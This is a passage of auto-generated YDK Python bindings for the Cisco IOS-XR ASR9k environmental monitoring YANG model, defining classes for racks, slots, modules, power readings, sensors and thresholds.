.. attribute:: power_measure_caliber
Measure Caliber
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: power_current_type
Current Type of the Unit
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: power_origin
The Power Origin of the Unit
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: power_admin_state
Admin Status of the Unit
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: power_oper_state
Oper Status of the Unit
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: power_state_enter_reason
Enter Reason for the State
**type**\: str
**length:** 0..50
**config**\: False
"""
_prefix = 'asr9k-sc-envmon-oper'
_revision = '2017-01-19'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(EnvironmentalMonitoringCli.RackClis.RackCli.SlotClis.SlotCli.ModuleClis.ModuleCli.PowerCli.PowerBagCli, self).__init__()
self.yang_name = "power-bag-cli"
self.yang_parent_name = "power-cli"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('power_value', (YLeaf(YType.int32, 'power-value'), ['int'])),
('power_max_value', (YLeaf(YType.int32, 'power-max-value'), ['int'])),
('power_unit_multiplier', (YLeaf(YType.uint32, 'power-unit-multiplier'), ['int'])),
('power_accuracy', (YLeaf(YType.uint32, 'power-accuracy'), ['int'])),
('power_measure_caliber', (YLeaf(YType.uint32, 'power-measure-caliber'), ['int'])),
('power_current_type', (YLeaf(YType.uint32, 'power-current-type'), ['int'])),
('power_origin', (YLeaf(YType.uint32, 'power-origin'), ['int'])),
('power_admin_state', (YLeaf(YType.uint32, 'power-admin-state'), ['int'])),
('power_oper_state', (YLeaf(YType.uint32, 'power-oper-state'), ['int'])),
('power_state_enter_reason', (YLeaf(YType.str, 'power-state-enter-reason'), ['str'])),
])
self.power_value = None
self.power_max_value = None
self.power_unit_multiplier = None
self.power_accuracy = None
self.power_measure_caliber = None
self.power_current_type = None
self.power_origin = None
self.power_admin_state = None
self.power_oper_state = None
self.power_state_enter_reason = None
self._segment_path = lambda: "power-bag-cli"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(EnvironmentalMonitoringCli.RackClis.RackCli.SlotClis.SlotCli.ModuleClis.ModuleCli.PowerCli.PowerBagCli, ['power_value', 'power_max_value', 'power_unit_multiplier', 'power_accuracy', 'power_measure_caliber', 'power_current_type', 'power_origin', 'power_admin_state', 'power_oper_state', 'power_state_enter_reason'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_asr9k_sc_envmon_oper as meta
return meta._meta_table['EnvironmentalMonitoringCli.RackClis.RackCli.SlotClis.SlotCli.ModuleClis.ModuleCli.PowerCli.PowerBagCli']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_asr9k_sc_envmon_oper as meta
return meta._meta_table['EnvironmentalMonitoringCli.RackClis.RackCli.SlotClis.SlotCli.ModuleClis.ModuleCli.PowerCli']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_asr9k_sc_envmon_oper as meta
return meta._meta_table['EnvironmentalMonitoringCli.RackClis.RackCli.SlotClis.SlotCli.ModuleClis.ModuleCli']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_asr9k_sc_envmon_oper as meta
return meta._meta_table['EnvironmentalMonitoringCli.RackClis.RackCli.SlotClis.SlotCli.ModuleClis']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_asr9k_sc_envmon_oper as meta
return meta._meta_table['EnvironmentalMonitoringCli.RackClis.RackCli.SlotClis.SlotCli']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_asr9k_sc_envmon_oper as meta
return meta._meta_table['EnvironmentalMonitoringCli.RackClis.RackCli.SlotClis']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_asr9k_sc_envmon_oper as meta
return meta._meta_table['EnvironmentalMonitoringCli.RackClis.RackCli']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_asr9k_sc_envmon_oper as meta
return meta._meta_table['EnvironmentalMonitoringCli.RackClis']['meta_info']
def clone_ptr(self):
self._top_entity = EnvironmentalMonitoringCli()
return self._top_entity
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_asr9k_sc_envmon_oper as meta
return meta._meta_table['EnvironmentalMonitoringCli']['meta_info']
class EnvironmentalMonitoring(_Entity_):
"""
environmental monitoring
.. attribute:: racks
Table of racks
**type**\: :py:class:`Racks <ydk.models.cisco_ios_xr.Cisco_IOS_XR_asr9k_sc_envmon_oper.EnvironmentalMonitoring.Racks>`
**config**\: False
"""
_prefix = 'asr9k-sc-envmon-oper'
_revision = '2017-01-19'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(EnvironmentalMonitoring, self).__init__()
self._top_entity = None
self.yang_name = "environmental-monitoring"
self.yang_parent_name = "Cisco-IOS-XR-asr9k-sc-envmon-oper"
self.is_top_level_class = True
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("racks", ("racks", EnvironmentalMonitoring.Racks))])
self._leafs = OrderedDict()
self.racks = EnvironmentalMonitoring.Racks()
self.racks.parent = self
self._children_name_map["racks"] = "racks"
self._segment_path = lambda: "Cisco-IOS-XR-asr9k-sc-envmon-oper:environmental-monitoring"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(EnvironmentalMonitoring, [], name, value)
class Racks(_Entity_):
"""
Table of racks
.. attribute:: rack
Number
**type**\: list of :py:class:`Rack <ydk.models.cisco_ios_xr.Cisco_IOS_XR_asr9k_sc_envmon_oper.EnvironmentalMonitoring.Racks.Rack>`
**config**\: False
"""
_prefix = 'asr9k-sc-envmon-oper'
_revision = '2017-01-19'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(EnvironmentalMonitoring.Racks, self).__init__()
self.yang_name = "racks"
self.yang_parent_name = "environmental-monitoring"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("rack", ("rack", EnvironmentalMonitoring.Racks.Rack))])
self._leafs = OrderedDict()
self.rack = YList(self)
self._segment_path = lambda: "racks"
self._absolute_path = lambda: "Cisco-IOS-XR-asr9k-sc-envmon-oper:environmental-monitoring/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(EnvironmentalMonitoring.Racks, [], name, value)
class Rack(_Entity_):
"""
Number
.. attribute:: rack (key)
Rack number
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: slots
Table of slots
**type**\: :py:class:`Slots <ydk.models.cisco_ios_xr.Cisco_IOS_XR_asr9k_sc_envmon_oper.EnvironmentalMonitoring.Racks.Rack.Slots>`
**config**\: False
"""
_prefix = 'asr9k-sc-envmon-oper'
_revision = '2017-01-19'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(EnvironmentalMonitoring.Racks.Rack, self).__init__()
self.yang_name = "rack"
self.yang_parent_name = "racks"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = ['rack']
self._child_classes = OrderedDict([("slots", ("slots", EnvironmentalMonitoring.Racks.Rack.Slots))])
self._leafs = OrderedDict([
('rack', (YLeaf(YType.uint32, 'rack'), ['int'])),
])
self.rack = None
self.slots = EnvironmentalMonitoring.Racks.Rack.Slots()
self.slots.parent = self
self._children_name_map["slots"] = "slots"
self._segment_path = lambda: "rack" + "[rack='" + str(self.rack) + "']"
self._absolute_path = lambda: "Cisco-IOS-XR-asr9k-sc-envmon-oper:environmental-monitoring/racks/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(EnvironmentalMonitoring.Racks.Rack, ['rack'], name, value)
class Slots(_Entity_):
"""
Table of slots
.. attribute:: slot
Name
**type**\: list of :py:class:`Slot <ydk.models.cisco_ios_xr.Cisco_IOS_XR_asr9k_sc_envmon_oper.EnvironmentalMonitoring.Racks.Rack.Slots.Slot>`
**config**\: False
"""
_prefix = 'asr9k-sc-envmon-oper'
_revision = '2017-01-19'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(EnvironmentalMonitoring.Racks.Rack.Slots, self).__init__()
self.yang_name = "slots"
self.yang_parent_name = "rack"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("slot", ("slot", EnvironmentalMonitoring.Racks.Rack.Slots.Slot))])
self._leafs = OrderedDict()
self.slot = YList(self)
self._segment_path = lambda: "slots"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(EnvironmentalMonitoring.Racks.Rack.Slots, [], name, value)
class Slot(_Entity_):
"""
Name
.. attribute:: slot (key)
Slot name
**type**\: str
**pattern:** [\\w\\\-\\.\:,\_@#%$\\+=\\\|;]+
**config**\: False
.. attribute:: modules
Table of modules
**type**\: :py:class:`Modules <ydk.models.cisco_ios_xr.Cisco_IOS_XR_asr9k_sc_envmon_oper.EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules>`
**config**\: False
"""
_prefix = 'asr9k-sc-envmon-oper'
_revision = '2017-01-19'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(EnvironmentalMonitoring.Racks.Rack.Slots.Slot, self).__init__()
self.yang_name = "slot"
self.yang_parent_name = "slots"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['slot']
self._child_classes = OrderedDict([("modules", ("modules", EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules))])
self._leafs = OrderedDict([
('slot', (YLeaf(YType.str, 'slot'), ['str'])),
])
self.slot = None
self.modules = EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules()
self.modules.parent = self
self._children_name_map["modules"] = "modules"
self._segment_path = lambda: "slot" + "[slot='" + str(self.slot) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(EnvironmentalMonitoring.Racks.Rack.Slots.Slot, ['slot'], name, value)
class Modules(_Entity_):
"""
Table of modules
.. attribute:: module
Name
**type**\: list of :py:class:`Module <ydk.models.cisco_ios_xr.Cisco_IOS_XR_asr9k_sc_envmon_oper.EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module>`
**config**\: False
"""
_prefix = 'asr9k-sc-envmon-oper'
_revision = '2017-01-19'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules, self).__init__()
self.yang_name = "modules"
self.yang_parent_name = "slot"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("module", ("module", EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module))])
self._leafs = OrderedDict()
self.module = YList(self)
self._segment_path = lambda: "modules"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules, [], name, value)
class Module(_Entity_):
"""
Name
.. attribute:: module (key)
Module name
**type**\: str
**pattern:** [\\w\\\-\\.\:,\_@#%$\\+=\\\|;]+
**config**\: False
.. attribute:: power
Module Power Draw
**type**\: :py:class:`Power <ydk.models.cisco_ios_xr.Cisco_IOS_XR_asr9k_sc_envmon_oper.EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.Power>`
**config**\: False
.. attribute:: sensor_types
Table of sensor types
**type**\: :py:class:`SensorTypes <ydk.models.cisco_ios_xr.Cisco_IOS_XR_asr9k_sc_envmon_oper.EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes>`
**config**\: False
"""
_prefix = 'asr9k-sc-envmon-oper'
_revision = '2017-01-19'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module, self).__init__()
self.yang_name = "module"
self.yang_parent_name = "modules"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['module']
self._child_classes = OrderedDict([("power", ("power", EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.Power)), ("sensor-types", ("sensor_types", EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes))])
self._leafs = OrderedDict([
('module', (YLeaf(YType.str, 'module'), ['str'])),
])
self.module = None
self.power = EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.Power()
self.power.parent = self
self._children_name_map["power"] = "power"
self.sensor_types = EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes()
self.sensor_types.parent = self
self._children_name_map["sensor_types"] = "sensor-types"
self._segment_path = lambda: "module" + "[module='" + str(self.module) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module, ['module'], name, value)
class Power(_Entity_):
"""
Module Power Draw
.. attribute:: power_bag
Detailed power bag information
**type**\: :py:class:`PowerBag <ydk.models.cisco_ios_xr.Cisco_IOS_XR_asr9k_sc_envmon_oper.EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.Power.PowerBag>`
**config**\: False
"""
_prefix = 'asr9k-sc-envmon-oper'
_revision = '2017-01-19'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.Power, self).__init__()
self.yang_name = "power"
self.yang_parent_name = "module"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("power-bag", ("power_bag", EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.Power.PowerBag))])
self._leafs = OrderedDict()
self.power_bag = EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.Power.PowerBag()
self.power_bag.parent = self
self._children_name_map["power_bag"] = "power-bag"
self._segment_path = lambda: "power"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.Power, [], name, value)
class PowerBag(_Entity_):
"""
Detailed power bag information
.. attribute:: power_value
Current Power Value of the Unit
**type**\: int
**range:** \-2147483648..2147483647
**config**\: False
.. attribute:: power_max_value
Max Power Value of the Unit
**type**\: int
**range:** \-2147483648..2147483647
**config**\: False
.. attribute:: power_unit_multiplier
Unit Multiplier of Power
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: power_accuracy
Accuracy of the Power Value
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: power_measure_caliber
Measure Caliber
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: power_current_type
Current Type of the Unit
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: power_origin
The Power Origin of the Unit
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: power_admin_state
Admin Status of the Unit
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: power_oper_state
Oper Status of the Unit
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: power_state_enter_reason
Enter Reason for the State
**type**\: str
**length:** 0..50
**config**\: False
"""
_prefix = 'asr9k-sc-envmon-oper'
_revision = '2017-01-19'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.Power.PowerBag, self).__init__()
self.yang_name = "power-bag"
self.yang_parent_name = "power"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('power_value', (YLeaf(YType.int32, 'power-value'), ['int'])),
('power_max_value', (YLeaf(YType.int32, 'power-max-value'), ['int'])),
('power_unit_multiplier', (YLeaf(YType.uint32, 'power-unit-multiplier'), ['int'])),
('power_accuracy', (YLeaf(YType.uint32, 'power-accuracy'), ['int'])),
('power_measure_caliber', (YLeaf(YType.uint32, 'power-measure-caliber'), ['int'])),
('power_current_type', (YLeaf(YType.uint32, 'power-current-type'), ['int'])),
('power_origin', (YLeaf(YType.uint32, 'power-origin'), ['int'])),
('power_admin_state', (YLeaf(YType.uint32, 'power-admin-state'), ['int'])),
('power_oper_state', (YLeaf(YType.uint32, 'power-oper-state'), ['int'])),
('power_state_enter_reason', (YLeaf(YType.str, 'power-state-enter-reason'), ['str'])),
])
self.power_value = None
self.power_max_value = None
self.power_unit_multiplier = None
self.power_accuracy = None
self.power_measure_caliber = None
self.power_current_type = None
self.power_origin = None
self.power_admin_state = None
self.power_oper_state = None
self.power_state_enter_reason = None
self._segment_path = lambda: "power-bag"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.Power.PowerBag, ['power_value', 'power_max_value', 'power_unit_multiplier', 'power_accuracy', 'power_measure_caliber', 'power_current_type', 'power_origin', 'power_admin_state', 'power_oper_state', 'power_state_enter_reason'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_asr9k_sc_envmon_oper as meta
return meta._meta_table['EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.Power.PowerBag']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_asr9k_sc_envmon_oper as meta
return meta._meta_table['EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.Power']['meta_info']
class SensorTypes(_Entity_):
"""
Table of sensor types
.. attribute:: sensor_type
Type of sensor
**type**\: list of :py:class:`SensorType <ydk.models.cisco_ios_xr.Cisco_IOS_XR_asr9k_sc_envmon_oper.EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType>`
**config**\: False
"""
_prefix = 'asr9k-sc-envmon-oper'
_revision = '2017-01-19'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes, self).__init__()
self.yang_name = "sensor-types"
self.yang_parent_name = "module"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("sensor-type", ("sensor_type", EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType))])
self._leafs = OrderedDict()
self.sensor_type = YList(self)
self._segment_path = lambda: "sensor-types"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes, [], name, value)
class SensorType(_Entity_):
"""
Type of sensor
.. attribute:: type (key)
Sensor type
**type**\: str
**pattern:** [\\w\\\-\\.\:,\_@#%$\\+=\\\|;]+
**config**\: False
.. attribute:: sensor_names
Table of sensors
**type**\: :py:class:`SensorNames <ydk.models.cisco_ios_xr.Cisco_IOS_XR_asr9k_sc_envmon_oper.EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType.SensorNames>`
**config**\: False
"""
_prefix = 'asr9k-sc-envmon-oper'
_revision = '2017-01-19'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType, self).__init__()
self.yang_name = "sensor-type"
self.yang_parent_name = "sensor-types"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['type']
self._child_classes = OrderedDict([("sensor-names", ("sensor_names", EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType.SensorNames))])
self._leafs = OrderedDict([
('type', (YLeaf(YType.str, 'type'), ['str'])),
])
self.type = None
self.sensor_names = EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType.SensorNames()
self.sensor_names.parent = self
self._children_name_map["sensor_names"] = "sensor-names"
self._segment_path = lambda: "sensor-type" + "[type='" + str(self.type) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType, ['type'], name, value)
class SensorNames(_Entity_):
"""
Table of sensors
.. attribute:: sensor_name
Name of sensor
**type**\: list of :py:class:`SensorName <ydk.models.cisco_ios_xr.Cisco_IOS_XR_asr9k_sc_envmon_oper.EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType.SensorNames.SensorName>`
**config**\: False
"""
_prefix = 'asr9k-sc-envmon-oper'
_revision = '2017-01-19'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType.SensorNames, self).__init__()
self.yang_name = "sensor-names"
self.yang_parent_name = "sensor-type"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("sensor-name", ("sensor_name", EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType.SensorNames.SensorName))])
self._leafs = OrderedDict()
self.sensor_name = YList(self)
self._segment_path = lambda: "sensor-names"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType.SensorNames, [], name, value)
class SensorName(_Entity_):
"""
Name of sensor
.. attribute:: name (key)
Sensor name
**type**\: str
**pattern:** [\\w\\\-\\.\:,\_@#%$\\+=\\\|;]+
**config**\: False
.. attribute:: thresholds
The threshold information
**type**\: :py:class:`Thresholds <ydk.models.cisco_ios_xr.Cisco_IOS_XR_asr9k_sc_envmon_oper.EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType.SensorNames.SensorName.Thresholds>`
**config**\: False
.. attribute:: value_detailed
Detailed sensor information including the sensor value
**type**\: :py:class:`ValueDetailed <ydk.models.cisco_ios_xr.Cisco_IOS_XR_asr9k_sc_envmon_oper.EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType.SensorNames.SensorName.ValueDetailed>`
**config**\: False
.. attribute:: value_brief
The sensor value
**type**\: str
**pattern:** [0\-9a\-fA\-F]{1,8}
**config**\: False
"""
_prefix = 'asr9k-sc-envmon-oper'
_revision = '2017-01-19'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType.SensorNames.SensorName, self).__init__()
self.yang_name = "sensor-name"
self.yang_parent_name = "sensor-names"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['name']
self._child_classes = OrderedDict([("thresholds", ("thresholds", EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType.SensorNames.SensorName.Thresholds)), ("value-detailed", ("value_detailed", EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType.SensorNames.SensorName.ValueDetailed))])
self._leafs = OrderedDict([
('name', (YLeaf(YType.str, 'name'), ['str'])),
('value_brief', (YLeaf(YType.str, 'value-brief'), ['str'])),
])
self.name = None
self.value_brief = None
self.thresholds = EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType.SensorNames.SensorName.Thresholds()
self.thresholds.parent = self
self._children_name_map["thresholds"] = "thresholds"
self.value_detailed = EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType.SensorNames.SensorName.ValueDetailed()
self.value_detailed.parent = self
self._children_name_map["value_detailed"] = "value-detailed"
self._segment_path = lambda: "sensor-name" + "[name='" + str(self.name) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType.SensorNames.SensorName, ['name', 'value_brief'], name, value)
class Thresholds(_Entity_):
"""
The threshold information
.. attribute:: threshold
Types of thresholds
**type**\: list of :py:class:`Threshold <ydk.models.cisco_ios_xr.Cisco_IOS_XR_asr9k_sc_envmon_oper.EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType.SensorNames.SensorName.Thresholds.Threshold>`
**config**\: False
"""
_prefix = 'asr9k-sc-envmon-oper'
_revision = '2017-01-19'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType.SensorNames.SensorName.Thresholds, self).__init__()
self.yang_name = "thresholds"
self.yang_parent_name = "sensor-name"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("threshold", ("threshold", EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType.SensorNames.SensorName.Thresholds.Threshold))])
self._leafs = OrderedDict()
self.threshold = YList(self)
self._segment_path = lambda: "thresholds"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType.SensorNames.SensorName.Thresholds, [], name, value)
class Threshold(_Entity_):
"""
Types of thresholds
.. attribute:: type (key)
Threshold type
**type**\: str
**pattern:** [\\w\\\-\\.\:,\_@#%$\\+=\\\|;]+
**config**\: False
.. attribute:: value_detailed
Detailed sensor threshold information
**type**\: :py:class:`ValueDetailed <ydk.models.cisco_ios_xr.Cisco_IOS_XR_asr9k_sc_envmon_oper.EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType.SensorNames.SensorName.Thresholds.Threshold.ValueDetailed>`
**config**\: False
.. attribute:: trap
Threshold trap enable flag true\-ENABLE, false\-DISABLE
**type**\: bool
**config**\: False
.. attribute:: value_brief
Threshold value for the sensor
**type**\: str
**pattern:** [0\-9a\-fA\-F]{1,8}
**config**\: False
"""
_prefix = 'asr9k-sc-envmon-oper'
_revision = '2017-01-19'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType.SensorNames.SensorName.Thresholds.Threshold, self).__init__()
self.yang_name = "threshold"
self.yang_parent_name = "thresholds"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['type']
self._child_classes = OrderedDict([("value-detailed", ("value_detailed", EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType.SensorNames.SensorName.Thresholds.Threshold.ValueDetailed))])
self._leafs = OrderedDict([
('type', (YLeaf(YType.str, 'type'), ['str'])),
('trap', (YLeaf(YType.boolean, 'trap'), ['bool'])),
('value_brief', (YLeaf(YType.str, 'value-brief'), ['str'])),
])
self.type = None
self.trap = None
self.value_brief = None
self.value_detailed = EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType.SensorNames.SensorName.Thresholds.Threshold.ValueDetailed()
self.value_detailed.parent = self
self._children_name_map["value_detailed"] = "value-detailed"
self._segment_path = lambda: "threshold" + "[type='" + str(self.type) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType.SensorNames.SensorName.Thresholds.Threshold, ['type', 'trap', 'value_brief'], name, value)
class ValueDetailed(_Entity_):
"""
Detailed sensor threshold
information
.. attribute:: threshold_severity
Indicates minor, major, critical severities
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: threshold_relation
Indicates relation between sensor value and threshold
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: threshold_value
Value of the configured threshold
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: threshold_evaluation
Indicates the result of the most recent evaluation of the thresholD
**type**\: bool
**config**\: False
.. attribute:: threshold_notification_enabled
Indicates whether or not a notification should result, in case of threshold violation
**type**\: bool
**config**\: False
"""
_prefix = 'asr9k-sc-envmon-oper'
_revision = '2017-01-19'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType.SensorNames.SensorName.Thresholds.Threshold.ValueDetailed, self).__init__()
self.yang_name = "value-detailed"
self.yang_parent_name = "threshold"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('threshold_severity', (YLeaf(YType.uint32, 'threshold-severity'), ['int'])),
('threshold_relation', (YLeaf(YType.uint32, 'threshold-relation'), ['int'])),
('threshold_value', (YLeaf(YType.uint32, 'threshold-value'), ['int'])),
('threshold_evaluation', (YLeaf(YType.boolean, 'threshold-evaluation'), ['bool'])),
('threshold_notification_enabled', (YLeaf(YType.boolean, 'threshold-notification-enabled'), ['bool'])),
])
self.threshold_severity = None
self.threshold_relation = None
self.threshold_value = None
self.threshold_evaluation = None
self.threshold_notification_enabled = None
self._segment_path = lambda: "value-detailed"
self._is_frozen = True
def __setattr__(self, name, value):
